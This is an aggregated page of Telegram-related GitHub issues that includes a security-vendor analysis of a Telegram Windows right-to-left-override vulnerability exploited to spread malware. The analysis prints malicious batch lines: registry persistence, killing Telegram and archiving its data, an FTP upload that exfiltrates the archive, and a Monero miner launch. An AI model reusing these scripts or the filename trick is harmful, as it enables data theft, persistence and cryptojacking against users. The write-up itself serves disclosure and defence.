Contribute to Open Source. Search issue labels to find the right project for you!

Отправка сообщения боту Telegram из 1с



Соединение = Новый HTTPСоединение(“”,443,,,,,Новый ЗащищенноеСоединениеOpenSSL()); ПолучениеЗапрос = “bot”+ТокенБота+“/getUpdates”; Запрос = Новый HTTPЗапрос(ПолучениеЗапрос); Ответ = Соединение.Получить(Запрос);

ЧтениеJSON = Новый ЧтениеJSON(); ЧтениеJSON.УстановитьСтроку(Ответ.ПолучитьТелоКакСтроку()); Результат = ПрочитатьJSON(ЧтениеJSON); ЧтениеJSON.Закрыть();

МассивСообщений = Результат.result; Для каждого СтруктураСообщения из МассивСообщений Цикл Отправитель = “”+СтруктураСообщения.message.from.first_name+“ ”+СтруктураСообщения.message.from.last_name; ИДЧата = Формат(СтруктураСообщения, “ЧГ=”);

Сообщить(СтрШаблон("Отправитель: %1; ID чата: %2", Отправитель, ИДЧата));


//Ищем себя и запоминаем свой ID чата //У нас все есть для отправки сообщения из 1С вот код:

ПроизвольныйТекст = “Тест”; Соединение = Новый HTTPСоединение(“”,443,,,,,Новый ЗащищенноеСоединениеOpenSSL()); ПолучениеЗапрос = “bot”+ТокенБота+“/sendMessage?chat_id=”+IDЧата+“&text=”+ПроизвольныйТекст; Запрос = Новый HTTPЗапрос(ПолучениеЗапрос); Соединение.Получить(Запрос);

// // //

Updated 23/02/2018 10:42

Telegram channel issue: [400] Bad Request (BUTTON_DATA_INVALID)


Bot Info

  • SDK Platform: Node.js
  • SDK Version: 3.14.0
  • Active Channels: Telegram
  • Deployment Environment: Azure App Service (Azure Web App)

Issue Description

Telegram channel fails with following error in console:

Error: POST to '' failed: [400] Bad Request
    at Request._callback (D:\home\site\wwwroot\node_modules\botbuilder\lib\bots\ChatConnector.js:559:46)
    at Request.self.callback (D:\home\site\wwwroot\node_modules\request\request.js:186:22)
    at emitTwo (events.js:106:13)
    at Request.emit (events.js:191:7)
    at Request.<anonymous> (D:\home\site\wwwroot\node_modules\request\request.js:1163:10)
    at emitOne (events.js:96:13)
    at Request.emit (events.js:188:7)
    at IncomingMessage.<anonymous> (D:\home\site\wwwroot\node_modules\request\request.js:1085:12)
    at IncomingMessage.g (events.js:291:16)
    at emitNone (events.js:91:20)

In channel status log I see the following error messages:

{"ok":false,"error_code":400,"description":"Bad Request: BUTTON_DATA_INVALID"}

Code Example

var restify = require('restify');
var builder = require('botbuilder');

// Setup Restify Server
var server = restify.createServer();
server.listen(process.env.port || process.env.PORT || 3978, function () {
   console.log('%s listening to %s',, server.url); 

// Create chat connector for communicating with the Bot Framework Service
var connector = new builder.ChatConnector({
    appId: process.env.MicrosoftAppId,
    appPassword: process.env.MicrosoftAppPassword

// Listen for messages from users'/api/messages', connector.listen());

var bot = new builder.UniversalBot(connector, [
    function (session) {
        builder.Prompts.choice(session, "Please select your choice, clicking the button",
                                ["Button 1", "Button 2"], { listStyle: 3 });
    function(session, results) {
        if (results.response.index == 0) {
        } else {

bot.on('conversationUpdate', function (message) {
    if (message.membersAdded) {
        message.membersAdded.forEach(function (identity) {
            if ( === {
                bot.beginDialog(message.address, '/');

Reproduction Steps

  1. Create bot application in Azure App Service
  2. Edit app.js and add the code example above
  3. Create a Telegram bot
  4. Add and register Telegram channel
  5. Try to start conversation with /start command

Expected Behavior

Expected Telegram channel to work properly.

Actual Results

When I start a conversation using /start command in Telegram, bot does not respond anything.

Updated 22/03/2018 18:33 8 Comments

Telegram: Title in Hero Card not bolded


Bot Info

  • SDK Platform: .Net
  • SDK Version: 3.13.1
  • Active Channels: Telegram
  • Deployment Environment: Azure App Service

Issue Description

When I set the Title property of a HeroCard to a string, then most channels (e.g. Webchat and Facebook) will bold it. Telegram will not. I think Telegram is technically capable of bolding text.

Code Example

Reproduction Steps

Expected Behavior

Title of the HeroCard is displayed in bold on Telegram channel.

Actual Results

Title of HeroCard on Telegram channel appears just as any other text (non-bold).

Updated 20/02/2018 22:42 7 Comments

[2018] Zero-day vulnerability in Telegram


Zero-day vulnerability in Telegram

Cybercriminals exploited Telegram flaw to launch multipurpose attacks.

By Alexey Firsh on February 13, 2018. 9:00 am

In October 2017, we learned of a vulnerability in Telegram Messenger’s Windows client that was being exploited in the wild. It involves the use of a classic right-to-left override attack when a user sends files over the messenger service.

Right-to-left override in a nutshell

The special nonprinting right-to-left override (RLO) character is used to reverse the order of the characters that come after that character in the string. In the Unicode character table, it is represented as ‘U+202E’; one area of legitimate use is when typing Arabic text. In an attack, this character can be used to mislead the victim. It is usually used when displaying the name and extension of an executable file: a piece of software vulnerable to this sort of attack will display the filename incompletely or in reverse.

<p align=“center”><img src=“”></p> <p align=“center”>New Mac Malware uses Right-to-Left override character (U+202E) to cause OS X to display this… …</p>

Launching an attack on Telegram

Below is an account of how this vulnerability was exploited in Telegram:

  • The cybercriminal prepares the malware to be sent in a message. For example, a JS file is renamed as follows:

evil.js -> photo_high_reU+202Egnp.js Where U+202E is the RLO character to make Telegram display the remaining string gnp.js in reverse. Note that this operation does not change the actual file – it still has the extension *.js.

  • The attacker sends the message, and – surprise! – the recipient sees an incoming PNG image file instead of a JS file:

<p align=“center”><img src=“”></p>

  • When the user clicks on this file, the standard Windows security notification is displayed:

<p align=“center”><img src=“”></p>

Importantly, this notification is only displayed if it hasn’t been disabled in the system’s settings. If the user clicks on ‘Run’, the malicious file is launched.

Exploitation in the wild

After learning the vulnerability, we began to research cases where it was actually exploited. These cases fall into several general scenarios.

Remote control

The aim of this sort of attack is to take control of the victim’s system, and involves the attacker studying the target system’s environment and the installation of additional modules.

Attack flowchart

At the first stage, a downloader is sent to the target, which is written in .Net, and uses Telegram API as the command protocol:

With this token and API, it is easy to find the Telegram bot via which the infected systems are controlled:

When launched, it modifies startup registry key to achieve persistence on a system and copies its executable file into one of the directories, depending on the environment:

Then it begins to check every two seconds for commands arriving from the control bot. Note that the commands are implemented in Russian:

The list of supported commands shows that the bot can silently deploy arbitrary malicious tools like backdoors, loggers and other malware on the target system. A complete list of supported commands is given below:

Command (English translation) Function
“Онлайн (“Online) Send list of files in directory to control bot.
“Запус (“Launch) Launch executable file using Process.Start().
“Логгер (“Logger) Check if tor process is running, download, unpack it, delete the archive and launch its content.
“Скачать(“Download) Download file into its own directory.
“Удалить(“Delete) Delete file from its own directory.
“Распаковать(“Unpack) Unpack archive in its own directory using specified password.
Убить(Kill) Terminate specified process using process.Kill()
Скачат(Download) Same as ‘Download’ (see above), with different command parsing.
Запуск(Launch) Same as ‘Launch’ (see above), with different command parsing.
Удалить(Delete) Same as ‘Delete’ (see above), with different command parsing.
Распаковать(Unpack) Same as ‘Unpack’ (see above), with different command parsing.
Процессы(Processes) Send a list of commands running on target PC to control bot.

An analysis of these commands shows that this loader may be designed to download another piece of malware, possibly a logger that would spy on the victim user.

Miners and more

Amid the cryptocurrency boom, cybercriminals are increasingly moving away from ‘classic robbery’ to a new method of making money from their victims – namely mining cryptocurrency using the resources of an infected computer. All they have to do is run a mining client on the victim computer and specify the details of their cryptocurrency wallet.

Scenario #1

Attack flowchart

At the first stage of the attack, an SFX archive with a script is used that launches an executable file:


This run.exe file is in fact a BAT file. The batch script, after extraction, looks like this:

As we can see, the malicious program first opens a decoy file – in this case it is an image to lull the victim into a false sense of security.

Then, two miners launch one after the other. They are launched as services with the help of the nssm.exe utility, which is also contained in the same SFX archive.

  • nheq.exe: an Equihash miner for NiceHash (in this specific case, it mined Zcash). Can use the resources of both the CPU and graphics accelerator:

  • taskmgn.exe – another popular miner implementing the CryptoNight algorithm. It mines Fantomcoin and Monero. There is a known specific string with pdb path:

We have seen several versions of this batch script, some of which have extra features:

This specific version disables Windows security features, then logs on to a malicious FTP server, downloads a payload and launches it. In this case, the payload was an SFX archive that contains another miners and a Remote Manipulator System (RMS) client, an analog of TeamViewer. Using AutoIt scripts, the malware deploys RMS on the targeted computer for subsequent remote access:

The attack flowchart is approximately as follows:

We have examined this FTP server and found several more similar payloads, which are possibly loaded by other versions of this malware.

The file address4.exe is worthy of a special mention. Like the other files, it is an SFX archive with the following contents:

<p align=“center”><img src=“”></p>

All components named st*.exe are executable PE files converted in a similar way from batch scripts.

The SFX script launches the component st1.exe:


st1.exe adds st2.exe to the system startup by writing the appropriate record to the system registry:

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v RUN1 /d %temp%\adress\st2.exe /f

So the st2.exe file launches when system is booted next time:

TIMEOUT /T 10 /NOBREAK #Waits for Telegram to launch
chcp 1251
tskill telegram
taskkill /IM telegram.exe #Terminates Telegram processes
md %temp%\sss
cd %temp%\sss #Creates a temporary directory
“%temp%\adress\WinRAR.exe” A -ibck -inul -r -agYY-mm-dd-hh-mm-ss “%temp%\sss\1.rar” “%appdata%\Telegram Desktop” #Packs the Telegram directory into a RAR archive
ping -n 1 |>nul find /i “TTL=” && (start “” %temp%/adress/st3.exe) || (ping 127.1 -n 2& Goto :begin) #Checks Internet connection and launches st3.exe

As expected, st3.exe logs on to the malicious FTP server and uploads the RAR archive that was created earlier:

@echo XXXXXXXX>command.txt
@echo XXXXXXXX>>command.txt
@echo binary>>command.txt
@echo mput %temp%\sss\*.rar>>command.txt
@echo quit>>command.txt
ftp -s:command.txt -i
del command.txt
attrib %temp%/adress +H
attrib %temp%/adress\* +H

On that FTP server, we discovered several archives of this type containing Telegram directories stolen from the victims:

Each dump contains, as well as the Telegram client’s executables and utility files, an encrypted local cache containing different files used in personal communications: documents, videos and audio records and photos.

Scenario #2

Just like in the previous scenario, an attack starts with an SFX archive opening and launching a VBScript that it contains. Its main job is to open a decoy image to distract the user, and then download and launch the payload:

The payload is an SFX archive with the following script:

svchost.vbs is a script controlling the launch of the miner CryptoNight (csrs.exe). It monitors the task list; if it detects a task manager (taskmgr.exe, processhacker.exe) on that list, it terminates the miner’s process and re-launches it when the task manager is closed.

The script contains the appropriate comments:

The miner itself is launched as follows:

WshShell.Run “csrs.exe -a cryptonight -o stratum+tcp:// -u -p x -dbg -1″ & cores, 0

The pool address is associated with the cryptocurrency Monero.

On the server itself, in addition to the specified payload files, we found similar SFX archives with miners:


It appears that only Russian cybercriminals were aware of this vulnerability, with all the exploitation cases that we detected occurring in Russia. Also, while conducting a detailed research of these attacks we discovered a lot of artifacts that pointed to involvement by Russian cybercriminals.

We don’t have exact information about how long and which versions of the Telegram products were affected by the vulnerability. What we do know is that its exploitation in Windows clients began in March 2017. We informed the Telegram developers of the problem, and the vulnerability no longer occurs in Telegram’s products.

This paper presents only those cases that were reported by Kaspersky Lab’s telemetry systems. The full scope and other methods of exploitation remain unknown.



First stage




C2 servers



name?gpj.exe name?gpj.rar address?gpj.scr address_?gpj.scr photoadr?gepj.scr


Updated 14/02/2018 00:47

[Localization] The Locale field is missing in messages from Telegram, Skype, MS Teams and so on. Localization doesn't work at all.


Bot Info <!– As registered in the Bot Developer Portal at –>

  • SDK Platform: .NET
  • SDK Version: Microsoft.Bot.Builder.Azure 3.2.3
  • Active Channels: Telegram, Skype, MS Teams, Emulator
  • Deployment Environment: Auzure Bot Service

Issue Description

The activity which is coming from Telegram, Skype or MS Teams doesn’t have the Locale field anymore. So that the bot can’t localizes any messages for user.

Code Example

Telegram: { "type": "message", "id": "**", "timestamp": "2017-12-05T18:43:24.6431233Z", "serviceUrl": "", "channelId": "telegram", "from": { "id": "**", "name": "**" }, "conversation": { "isGroup": false, "id": "**" }, "recipient": { "id": "**", "name": "**" }, "text": "Text", "channelData": { "update_id": 418672082, "callback_query": { "id": "**", "from": { "id": 134567, "is_bot": false, "first_name": "**", "last_name": "**", "username": "**", "language_code": "en" }, "message": { "message_id": 307, "from": { "id": 134567, "is_bot": true, "first_name": "**", "username": "**" }, "chat": { "id": 7654321, "first_name": "**", "last_name": "**", "username": "**", "type": "private" }, "date": 1512498143, "text": "Text" }, "chat_instance": "2552744620053388356", "data": "Text" } } }

MS Teams: { "text": "Text", "textFormat": "plain", "type": "message", "timestamp": "2017-12-05T18:45:35.351Z", "localTimestamp": "2017-12-05T21:45:35.351+03:00", "id": "**", "channelId": "msteams", "serviceUrl": "", "from": { "id": "**", "name": "**", "aadObjectId": "35820c14-8b1a-4ffe-9cfc-a8e8b0858418" }, "conversation": { "id": "**" }, "recipient": { "id": "**", "name": "**" }, "entities": [ { "locale": "ru-RU", "country": "RU", "platform": "Web", "type": "clientInfo" } ], "channelData": { "tenant": { "id": "**" } } }

Bot Emulator: { "type": "message", "text": "Text", "from": { "id": "default-user", "name": "User" }, "locale": "ru-RU", "textFormat": "plain", "timestamp": "2017-12-05T18:47:38.087Z", "channelData": { "clientActivityId": "1512499640001.9503766533278897.0" }, "entities": [ { "type": "ClientCapabilities", "requiresBotState": true, "supportsTts": true, "supportsListening": true } ], "id": "m4g22ck45616" }

Expected Behavior

The channels must have the Locale field exactly as Emulator.

Updated 05/01/2018 02:00 7 Comments

Send new ticket via Telegram and Trigger notification via Telegram


<!– Hi there - thanks for filling an issue. Please ensure the following things before creating an issue - thank you! 🤓

  • Search existing issues and the for your issue - there might be a solution already
  • Make sure to use the latest version of Zammad if possible
  • Add the log/production.log file from your system. Attention: Make sure no confidential data is in it!
  • Please write the issue in english

  • The upper textblock will be removed automatically when you submit your issue * –>


  • Used Zammad version: 1.5.x
  • Used Zammad installation source: package
  • Operating system: Debian Jessie
  • Browser + version: Firefox 55.0.2

Expected behavior:

Send new ticket via Telegram and send Trigger notification via Telegram *

Actual behavior:

I can not find an option to send new tickets via Telegram. Also, I can not find an option to send trigger notifications via telegram. *

Steps to reproduce the behavior:

Create new ticket and change Trigger notification *

Updated 09/02/2018 16:25 3 Comments

Fork me on GitHub